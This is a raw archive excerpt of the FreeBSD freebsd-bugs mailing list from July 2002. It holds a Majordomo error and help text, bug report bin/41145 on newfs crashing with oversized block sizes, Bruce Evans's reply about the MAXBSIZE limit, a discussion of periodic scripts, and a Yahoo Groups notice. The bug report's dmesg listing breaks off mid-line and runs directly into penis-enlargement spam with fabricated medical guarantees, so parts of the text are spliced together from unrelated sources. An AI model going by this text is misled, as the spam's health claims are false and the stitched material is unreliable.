'z2vzlzivnjevnzu1mduuz2lmiib3awr0ad0imtaxiibozwlnahq9iji4iibib3jkzxi9ijei' not recognized. >>>> IGFsdD0izvfDxdfTMjExOLT9u/rNvLHqIiBjbGFzcz0iaW1nIj48L2E+PC9kaXY+CiAgICAg **** Command 'igfsdd0izvfdxdftmjexolt9u/rnvlhqiibjbgfzcz0iaw1nij48l2e+pc9kaxy+ciagicag' not recognized. >>>> ICAgICA8L3RkPgogICAgICAgIDwvdHI+CiAgICAgIDwvdGFibGU+CiAgICA8L3RkPgogIDwv **** Command 'icagica8l3rkpgogicagicagidwvdhi+ciagicagidwvdgfibgu+ciagica8l3rkpgogidwv' not recognized. >>>> dHI+CiAgPHRyIGJnY29sb3I9IiNFQkVCRUIiIHZhbGlnbj0idG9wIj4gCiAgICA8dGQgYWxp **** Command 'dhi+ciagphryigjny29sb3i9iinfqkvcruiiihzhbglnbj0idg9wij4gciagica8dgqgywxp' not recognized. >>>> Z249ImNlbnRlciIgaGVpZ2h0PSI0MCI+CiAgICAgIDx0YWJsZSB3aWR0aD0iMTgwIiBib3Jk **** Command 'z249imnlbnrlciigagvpz2h0psi0mci+ciagicagidx0ywjszsb3awr0ad0imtgwiibib3jk' not recognized. >>>> ZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCIgPgogICAgICAgIDx0cj4g **** Command 'zxi9ijaiignlbgxzcgfjaw5npsiwiibjzwxscgfkzgluzz0imcigpgogicagicagidx0cj4g' not recognized. >>>> CiAgICAgICAgICA8dGQ+PGEgaHJlZj0iamF2YXNjcmlwdDpzZW5kKCc3NTkyMycsJycsJycs **** Command 'ciagicagicagica8dgq+pgegahjlzj0iamf2yxnjcmlwddpzzw5kkcc3ntkymycsjycsjycs' not recognized. >>>> JycsJzAnLCc2Jyk7Ij48aW1nIHNyYz0iaHR0cDovL2ltYWdlcy5zb2h1LmNvbS9zbXMvaW1h **** Command 'jycsjzanlcc2jyk7ij48aw1nihnyyz0iahr0cdovl2ltywdlcy5zb2h1lmnvbs9zbxmvaw1h' not recognized. >>>> Z2VzLzAvNi83NTkyMy5naWYiIHdpZHRoPSI3MiIgaGVpZ2h0PSIyOCIgYm9yZGVyPSIxIiBh **** Command 'z2vzlzavni83ntkymy5nawyiihdpzhropsi3miigagvpz2h0psiyocigym9yzgvypsixiibh' not recognized. >>>> bHQ9IsW1u/nRx76tteS08828IiBjbGFzcz0iaW1nIj48L2E+PC90ZD4KICAgICAgICAgIDx0 **** Command 'bhq9isw1u/nrx76ttes08828iibjbgfzcz0iaw1nij48l2e+pc90zd4kicagicagicagidx0' not recognized. >>>> ZD4gCiAgICAgICAgICAgIDxkaXYgYWxpZ249InJpZ2h0Ij48YSBocmVmPSJqYXZhc2NyaXB0 **** Command 'zd4gciagicagicagicagidxkaxygywxpz249injpz2h0ij48ysbocmvmpsjqyxzhc2nyaxb0' not recognized. >>>> OnNlbmQoJzc1MzQ2JywnJywnJywnJywnMicsJzYxJyk7Ij48aW1nIHNyYz0iaHR0cDovL2lt **** Command 'onnlbmqojzc1mzq2jywnjywnjywnjywnmicsjzyxjyk7ij48aw1nihnyyz0iahr0cdovl2lt' not recognized. >>>> YWdlcy5zb2h1LmNvbS9zbXMvaW1hZ2VzLzIvNjEvNzUzNDYuZ2lmIiB3aWR0aD0iMTAxIiBo **** Command 'ywdlcy5zb2h1lmnvbs9zbxmvaw1hz2vzlzivnjevnzuzndyuz2lmiib3awr0ad0imtaxiibo' not recognized. >>>> ZWlnaHQ9IjI4IiBib3JkZXI9IjEiIGFsdD0izvfDxdfTMjExOLT9u/rNvLHqIiBjbGFzcz0i **** Command 'zwlnahq9iji4iibib3jkzxi9ijeiigfsdd0izvfdxdftmjexolt9u/rnvlhqiibjbgfzcz0i' not recognized. >>>> aW1nIj48L2E+PC9kaXY+CiAgICAgICAgICA8L3RkPgogICAgICAgIDwvdHI+CiAgICAgIDwv **** Command 'aw1nij48l2e+pc9kaxy+ciagicagicagica8l3rkpgogicagicagidwvdhi+ciagicagidwv' not recognized. >>>> dGFibGU+CiAgICA8L3RkPgogIDwvdHI+CjwvdGFibGU+CjwvYm9keT4KPC9odG1sPg=9 **** Command 'dgfibgu+ciagica8l3rkpgogidwvdhi+cjwvdgfibgu+cjwvym9ket4kpc9odg1spg=9' not recognized. >>>> --I37U76Z0eJ0LD880c352022X7p3I8C2S4p-- **** Command '--i37u76z0ej0ld880c352022x7p3i8c2s4p--' not recognized. **** No valid commands found. **** Commands must be in message BODY, not in HEADER. **** Help for listserv@freebsd.cz: This help message is being sent to you from the Majordomo mailing list management system at listserv@freebsd.cz. This is version 1.94.3 of Majordomo. If you're familiar with mail servers, an advanced user's summary of Majordomo's commands appears at the end of this message. Majordomo is an automated system which allows users to subscribe and unsubscribe to mailing lists, and to retrieve files from list archives. You can interact with the Majordomo software by sending it commands in the body of mail messages addressed to "listserv@freebsd.cz". Please do not put your commands on the subject line; Majordomo does not process commands in the subject line. You may put multiple Majordomo commands in the same mail message. Put each command on a line by itself. If you use a "signature block" at the end of your mail, Majordomo may mistakenly believe each line of your message is a command; you will then receive spurious error messages. To keep this from happening, either put a line starting with a hyphen ("-") before your signature, or put a line with just the word end on it in the same place. This will stop the Majordomo software from processing your signature as bad commands. Here are some of the things you can do using Majordomo: I. FINDING OUT WHICH LISTS ARE ON THIS SYSTEM To get a list of publicly-available mailing lists on this system, put the following line in the body of your mail message to listserv@freebsd.cz: lists Each line will contain the name of a mailing list and a brief description of the list. To get more information about a particular list, use the "info" command, supplying the name of the list. For example, if the name of the list about which you wish information is "demo-list", you would put the line info demo-list in the body of the mail message. II. SUBSCRIBING TO A LIST Once you've determined that you wish to subscribe to one or more lists on this system, you can send commands to Majordomo to have it add you to the list, so you can begin receiving mailings. To receive list mail at the address from which you're sending your mail, simply say "subscribe" followed by the list's name: subscribe demo-list If for some reason you wish to have the mailings go to a different address (a friend's address, a specific other system on which you have an account, or an address which is more correct than the one that automatically appears in the "From:" header on the mail you send), you would add that address to the command. For instance, if you're sending a request from your work account, but wish to receive "demo-list" mail at your personal account (for which we will use "jqpublic@my-isp.com" as an example), you'd put the line subscribe demo-list jqpublic@my-isp.com in the mail message body. Based on configuration decisions made by the list owners, you may be added to the mailing list automatically. You may also receive notification that an authorization key is required for subscription. Another message will be sent to the address to be subscribed (which may or may not be the same as yours) containing the key, and directing the user to send a command found in that message back to listserv@freebsd.cz. (This can be a bit of extra hassle, but it helps keep you from being swamped in extra email by someone who forged requests from your address.) You may also get a message that your subscription is being forwarded to the list owner for approval; some lists have waiting lists, or policies about who may subscribe. If your request is forwarded for approval, the list owner should contact you soon after your request. Upon subscribing, you should receive an introductory message, containing list policies and features. Save this message for future reference; it will also contain exact directions for unsubscribing. If you lose the intro mail and would like another copy of the policies, send this message to listserv@freebsd.cz: intro demo-list (substituting, of course, the real name of your list for "demo-list"). III. UNSUBSCRIBING FROM MAILING LISTS Your original intro message contains the exact command which should be used to remove your address from the list. However, in most cases, you may simply send the command "unsubscribe" followed by the list name: unsubscribe demo-list (This command may fail if your provider has changed the way your address is shown in your mail.) To remove an address other than the one from which you're sending the request, give that address in the command: unsubscribe demo-list jqpublic@my-isp.com In either of these cases, you can tell listserv@freebsd.cz to remove the address in question from all lists on this server by using "*" in place of the list name: unsubscribe * unsubscribe * jqpublic@my-isp.com IV. FINDING THE LISTS TO WHICH AN ADDRESS IS SUBSCRIBED To find the lists to which your address is subscribed, send this command in the body of a mail message to listserv@freebsd.cz: which You can look for other addresses, or parts of an address, by specifying the text for which Majordomo should search. For instance, to find which users at my-isp.com are subscribed to which lists, you might send the command which my-isp.com Note that many list owners completely or fully disable the "which" command, considering it a privacy violation. V. FINDING OUT WHO'S SUBSCRIBED TO A LIST To get a list of the addresses on a particular list, you may use the "who" command, followed by the name of the list: who demo-list Note that many list owners allow only a list's subscribers to use the "who" command, or disable it completely, believing it to be a privacy violation. VI. RETRIEVING FILES FROM A LIST'S ARCHIVES Many list owners keep archives of files associated with a list. These may include: - back issues of the list - help files, user profiles, and other documents associated with the list - daily, monthly, or yearly archives for the list To find out if a list has any files associated with it, use the "index" command: index demo-list If you see files in which you're interested, you may retrieve them by using the "get" command and specifying the list name and archive filename. For instance, to retrieve the files called "profile.form" (presumably a form to fill out with your profile) and "demo-list.9611" (presumably the messages posted to the list in November 1996), you would put the lines get demo-list profile.form get demo-list demo-list.9611 in your mail to listserv@freebsd.cz. VII. GETTING MORE HELP To contact a human site manager, send mail to Majordomo-Owner@freebsd.cz. To contact the owner of a specific list, send mail to that list's approval address, which is formed by adding "-approval" to the user-name portion of the list's address. For instance, to contact the list owner for demo-list@freebsd.cz, you would send mail to demo-list-approval@freebsd.cz. To get another copy of this help message, send mail to listserv@freebsd.cz with a line saying help in the message body. VIII. COMMAND SUMMARY FOR ADVANCED USERS In the description below items contained in []'s are optional. When providing the item, do not include the []'s around it. Items in angle brackets, such as
, are meta-symbols that should be replaced by appropriate text without the angle brackets. It understands the following commands: subscribe [
] Subscribe yourself (or
if specified) to the named . unsubscribe [
] Unsubscribe yourself (or
if specified) from the named . "unsubscribe *" will remove you (or
) from all lists. This _may not_ work if you have subscribed using multiple addresses. get Get a file related to . index Return an index of files you can "get" for . which [
] Find out which lists you (or
if specified) are on. who Find out who is on the named . info Retrieve the general introductory information for the named . intro Retrieve the introductory message sent to new users. Non-subscribers may not be able to retrieve this. lists Show the lists served by this Majordomo server. help Retrieve this message. end Stop processing commands (useful if your mailer adds a signature). Commands should be sent in the body of an email message to "listserv@freebsd.cz". Multiple commands can be processed provided each occurs on a separate line. Commands in the "Subject:" line are NOT processed. If you have any questions or problems, please contact "Majordomo-Owner@freebsd.cz". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 22:50:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8C53B37B400 for ; Mon, 29 Jul 2002 22:50:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id BF0B143E67 for ; Mon, 29 Jul 2002 22:50:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6U5o7JU089290 for ; Mon, 29 Jul 2002 22:50:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6U5o7D7089289; Mon, 29 Jul 2002 22:50:07 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2540937B400 for ; Mon, 29 Jul 2002 22:42:18 -0700 (PDT) Received: from FreeBSD.csie.NCTU.edu.tw (freebsd.csie.nctu.edu.tw [140.113.17.209]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0DBE143E3B for ; Mon, 29 Jul 2002 22:42:16 -0700 (PDT) (envelope-from ijliao@FreeBSD.csie.NCTU.edu.tw) Received: (from root@localhost) by FreeBSD.csie.NCTU.edu.tw (8.12.5/8.12.3) id g6U5hHop099606 for freebsd-gnats-submit@freebsd.org; Tue, 30 Jul 2002 13:43:17 +0800 (CST) (envelope-from ijliao@FreeBSD.csie.NCTU.edu.tw) Received: from FreeBSD.csie.NCTU.edu.tw (localhost [127.0.0.1]) by FreeBSD.csie.NCTU.edu.tw (8.12.5/8.12.3av) with ESMTP id g6U5hGtt099596 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Tue, 30 Jul 2002 13:43:16 +0800 (CST) (envelope-from ijliao@FreeBSD.csie.NCTU.edu.tw) Received: (from ijliao@localhost) by FreeBSD.csie.NCTU.edu.tw (8.12.5/8.12.5/Submit) id g6U5hGx9099595; Tue, 30 Jul 2002 13:43:16 +0800 (CST) Message-Id: <200207300543.g6U5hGx9099595@FreeBSD.csie.NCTU.edu.tw> Date: Tue, 30 Jul 2002 13:43:16 +0800 (CST) From: Ying-Chieh Liao Reply-To: Ying-Chieh Liao To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41145: newfs core dump (args : -b 262144 -f 32768) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41145 >Category: bin >Synopsis: newfs core dump (args : -b 262144 -f 32768) >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 22:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Ying-Chieh Liao >Release: FreeBSD 4.6-STABLE i386 >Organization: NCTU CSIE >Environment: System: FreeBSD FreeBSD.csie.NCTU.edu.tw 4.6-STABLE FreeBSD 4.6-STABLE #3: Fri Jun 28 18:37:58 CST 2002 root@FreeBSD.csie.NCTU.edu.tw:/freebsd/...../usr.obj/freebsd/source/FreeBSD-4/src/sys/FREEBSD i386 /var/run/dmesg.boot : Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.6-STABLE #3: Fri Jun 28 18:37:58 CST 2002 root@FreeBSD.csie.NCTU.edu.tw:/freebsd/...../usr.obj/freebsd/source/FreeBSD-4/src/sys/FREEBSD Timecounter "i8254" frequency 1193182 Hz CPU: Pentium III/Pentium III Xeon/Celeron (1129.76-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x6b1 Stepping = 1 Features=0x383fbff real memory = 2147483648 (2097152K bytes) avail memory = 2088763392 (2039808K bytes) Programming 16 pins in IOAPIC #0 IOAPIC #0 intpin 2 -> irq 0 Programming 16 pins in IOAPIC #1 FreeBSD/SMP: Multiprocessor motherboard cpu0 (BSP): apic id: 0, version: 0x00040011, at 0xfee00000 cpu1 (AP): apic id: 1, version: 0x00040011, at 0xfee00000 io0 (APIC): apic id: 4, version: 0x000f0011, at 0xfec00000 io1 (APIC): apic id: 5, version: 0x000f0011, at 0xfec01000 Preloaded elf kernel "kernel" at 0xc02ef000. Pentium Pro MTRR support enabled Using $PIR table, 10 entries at 0xc00f51c0 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard IOAPIC #1 intpin 6 -> irq 2 IOAPIC #1 intpin 4 -> irq 5 IOAPIC #1 intpin 5 -> irq 9 pci0: on pcib0 pci0: at 1.0 irq 2 fxp0: port 0xc400-0xc43f mem 0xfe800000-0xfe8fffff,0xfe9fe000-0xfe9fefff irq 5 at device 4.0 on pci0 fxp0: Ethernet address 00:e0:81:04:5c:72 inphy0: on miibus0 inphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto fxp1: port 0xc000-0xc03f mem 0xfe600000-0xfe6fffff,0xfe9fd000-0xfe9fdfff irq 9 at device 5.0 on pci0 fxp1: Ethernet address 00:e0:81:04:5c:73 inphy1: on miibus1 inphy1: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto isab0: at device 15.0 on pci0 isa0: on isab0 atapci0: at device 15.1 on pci0 atapci0: ATA channel disabled by BIOS pci0: at 15.2 irq 10 pcib1: on motherboard IOAPIC #1 intpin 11 -> irq 11 IOAPIC #1 intpin 7 -> irq 15 pci1: on pcib1 atapci1: port 0xef90-0xef9f,0xefa8-0xefab,0xefa0-0xefa7,0xefac-0xefaf,0xefe0-0xefe7 mem 0xfebfc000-0xfebfffff irq 11 at device 2.0 on pci1 ata2: at 0xefe0 on atapci1 ata3: at 0xefa0 on atapci1 pcib2: at device 3.0 on pci1 pci2: on pcib2 asr0: mem 0xe0000000-0xefffffff irq 15 at device 3.1 on pci1 asr0: major=154 asr0: ADAPTEC 3210S FW Rev. 370F, 2 channel, 256 CCBs, Protocol I2O orm0: "Want a BIG Penis?" Experience the results you've always wanted
with a massive scientific breakthrough:

Our Doctor-Approved Pill Will Actually Expand, Lengthen And Enlarge
Your Penis. 100% GUARANTEED!

Best of all, There Are NO Agonizing Hanging Weights, NO Tough
Exercises, NO Painful And Hard-To-Use Pumps, And There Is NO
Dangerous Surgery Involved.

We Guarantee genuine lasting results! Vig-Rx pills will work for
you 100%, or you will get 100% of your money back!


Click here to give it a try

"This is one of the best investments I have ever made. I can not
even begin to express how much gratitude I have for this product. I
am not even through with my first bottle and have already grown 1
in. in length and just over 1 in. in girth, and I still have another bottle to go! No! more am I the average 6 inch guy. THANK YOU SO MUCH " Ben, Idaho

To be removed from the opt-in list click here
--------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 0:18:57 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 792EF37B400 for ; Tue, 30 Jul 2002 00:18:53 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 27CE243E4A for ; Tue, 30 Jul 2002 00:18:52 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 11982 invoked by uid 85); 30 Jul 2002 07:33:45 -0000 Received: from sbnd.online.bg (HELO straylight.ringlet.net) (217.75.129.196) by south.nanolink.com with SMTP; 30 Jul 2002 07:33:44 -0000 Received: (qmail 6330 invoked by uid 1000); 30 Jul 2002 07:18:18 -0000 Date: Tue, 30 Jul 2002 10:18:17 +0300 From: Peter Pentchev To: Matthias Buelow Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail Message-ID: <20020730071817.GC2549@straylight.oblivion.bg> Mail-Followup-To: Matthias Buelow , freebsd-bugs@FreeBSD.org References: <200207290740.g6T7e31g091006@freefall.freebsd.org> <3D454B81.2050405@mukappabeta.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="VbJkn9YxBvnuCH5J" Content-Disposition: inline In-Reply-To: <3D454B81.2050405@mukappabeta.de> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --VbJkn9YxBvnuCH5J Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jul 29, 2002 at 04:04:49PM +0200, Matthias Buelow wrote: > Peter Pentchev wrote: >=20 > > I believe that it would not be feasible, if at all possible, for the > > system periodic scripts to support the correct syntax for various > > mailers' commands. An easy workaround would be for you to set >=20 > Then maybe such configuration-specific issues should be kept out > of the periodic scripts? I mean, if somebody wants more detailed > info about the mailing system in periodic, he could always add > periodic scripts, or use cron, or whatever. I think the currently available periodic scripts are tailored for a default installation; that is, they make it so a novice user reaps all the benefits of the software installed with the system (with Sendmail as the default MTA) with no need to tweak any knobs. Administrators who install other MTA's should arguably be prepared to tweak the system startup scripts a bit :) This is just my opinion, it should not be taken for the stance of the FreeBSD Project or something; I see the current situation as a good balance between ease for newcomers and easily-tweaked knobs for admins who take the time to tailor the system to their liking. G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 This would easier understand fewer had omitted. --VbJkn9YxBvnuCH5J Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Rj257Ri2jRYZRVMRAtDyAKCGk02cyIeBFtIqq8+NgB+MXmz2jACgnP8K TvgCMAY2LfUjZI6+YNNhBAY= =pdDX -----END PGP SIGNATURE----- --VbJkn9YxBvnuCH5J-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 1:50: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8B9A337B400 for ; Tue, 30 Jul 2002 01:50:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E125743E70 for ; Tue, 30 Jul 2002 01:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6U8o1JU021477 for ; Tue, 30 Jul 2002 01:50:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6U8o1l0021476; Tue, 30 Jul 2002 01:50:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 36C8837B400 for ; Tue, 30 Jul 2002 01:43:12 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id C9BEA43E3B for ; Tue, 30 Jul 2002 01:43:11 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6U8hBOT061679 for ; Tue, 30 Jul 2002 01:43:11 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6U8hBEH061678; Tue, 30 Jul 2002 01:43:11 -0700 (PDT) Message-Id: <200207300843.g6U8hBEH061678@www.freebsd.org> Date: Tue, 30 Jul 2002 01:43:11 -0700 (PDT) From: Dung Pham Quoc To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41152: squid Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41152 >Category: i386 >Synopsis: squid >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 01:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dung Pham Quoc >Release: 4.5 >Organization: NetNam ISP >Environment: >Description: >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 3: 0:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B5B6137B400 for ; Tue, 30 Jul 2002 03:00:10 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F15343E4A for ; Tue, 30 Jul 2002 03:00:10 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UA09JU031791 for ; Tue, 30 Jul 2002 03:00:09 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UA09hg031789; Tue, 30 Jul 2002 03:00:09 -0700 (PDT) Date: Tue, 30 Jul 2002 03:00:09 -0700 (PDT) Message-Id: <200207301000.g6UA09hg031789@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: bin/41145: newfs core dump (args : -b 262144 -f 32768) Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/41145; it has been noted by GNATS. From: Bruce Evans To: Ying-Chieh Liao Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/41145: newfs core dump (args : -b 262144 -f 32768) Date: Tue, 30 Jul 2002 19:59:22 +1000 (EST) On Tue, 30 Jul 2002, Ying-Chieh Liao wrote: > >Description: > > We have a new RAID (SCSI-to-IDE, Maxtor 80G x 8, RAID5) on da1 > when I run newfs with "-b 262144 -f 32768 -m 0", it core-dumped > but it's ok with "-b 65536 -f 8192 -m 0" > > it is strange that I've run newfs -b 262144 on a vinum (80G x 3, RAID1) > and everything is ok There is a kernel limit of MAXBSIZE = 65536, so ufs filesystems with a block size larger than 65536 cannot be mounted in FreeBSD. newfs and fsck_ffs use the same limit, so the cannot create or check such filesystems. newfs tends to die trying since it doesn't check for the limit being exceeded and uses data structures that depend on it not being exceeded. fsck_ffs tends to just not recognise such filesystems, since it checks the limit as part of its sanity check/search for the superblock. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 3: 2:49 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 85A9237B400 for ; Tue, 30 Jul 2002 03:02:46 -0700 (PDT) Received: from n33.grp.scd.yahoo.com (n33.grp.scd.yahoo.com [66.218.66.101]) by mx1.FreeBSD.org (Postfix) with SMTP id F1E8743E3B for ; Tue, 30 Jul 2002 03:02:45 -0700 (PDT) (envelope-from confirm-return-freebsd-bugs=freebsd.org@returns.groups.yahoo.com) X-eGroups-Return: confirm-return-freebsd-bugs=freebsd.org@returns.groups.yahoo.com Received: from [66.218.67.197] by n33.grp.scd.yahoo.com with NNFMP; 30 Jul 2002 10:02:45 -0000 Received: (qmail 67275 invoked by uid 7800); 30 Jul 2002 10:02:45 -0000 Date: 30 Jul 2002 10:02:45 -0000 Message-ID: <1028023365.153.67274.m4@yahoogrupos.com.br> From: Yahoo!Grupos Reply-To: confirm-s2-W0SIM7A_hKKLQMOY4IHm54mVc8w-freebsd-bugs=freebsd.org@yahoogrupos.com.br To: freebsd-bugs@freebsd.org Subject: Confirma=?ISO-8859-1?Q?=E7=E3?=o de pedido para entrar no grupo fug_sp_br MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ol=E1 freebsd-bugs@freebsd.org, Recebemos sua solicita=E7=E3o para entrar no grupo fug_sp_br=20 do Yahoo! Grupos, um servi=E7o de comunidades online gratuito e=20 super f=E1cil de usar. Este pedido expirar=E1 em 21 dias. PARA ENTRAR NESTE GRUPO:=20 1) V=E1 para o site do Yahoo! Grupos clicando neste link: http://br.groups.yahoo.com/i?i=3DW0SIM7A_hKKLQMOY4IHm54mVc8w&e=3Dfreebsd= -bugs%40freebsd%2Eorg=20 (Se n=E3o funcionar, use os comandos para cortar e colar o link acima na barra de endere=E7o do seu navegador.) -OU- 2) RESPONDA a este e-mail clicando em "Responder" e depois em "Enviar", no seu programa de e-mail. Se voc=EA n=E3o fez esta solicita=E7=E3o ou se n=E3o tem interesse em entra= r no grupo fug_sp_br, por favor, ignore esta mensagem. Sauda=E7=F5es, Atendimento ao usu=E1rio do Yahoo! Grupos=20 O uso que voc=EA faz do Yahoo! Grupos est=E1 sujeito aos http://br.yahoo.co= m/info/utos.html =20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 3:30:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9B01337B49E for ; Tue, 30 Jul 2002 03:30:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 428DF43E6E for ; Tue, 30 Jul 2002 03:30:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UAU4JU038433 for ; Tue, 30 Jul 2002 03:30:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UAU4B2038432; Tue, 30 Jul 2002 03:30:04 -0700 (PDT) Date: Tue, 30 Jul 2002 03:30:04 -0700 (PDT) Message-Id: <200207301030.g6UAU4B2038432@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Yar Tikhiy Subject: Re: 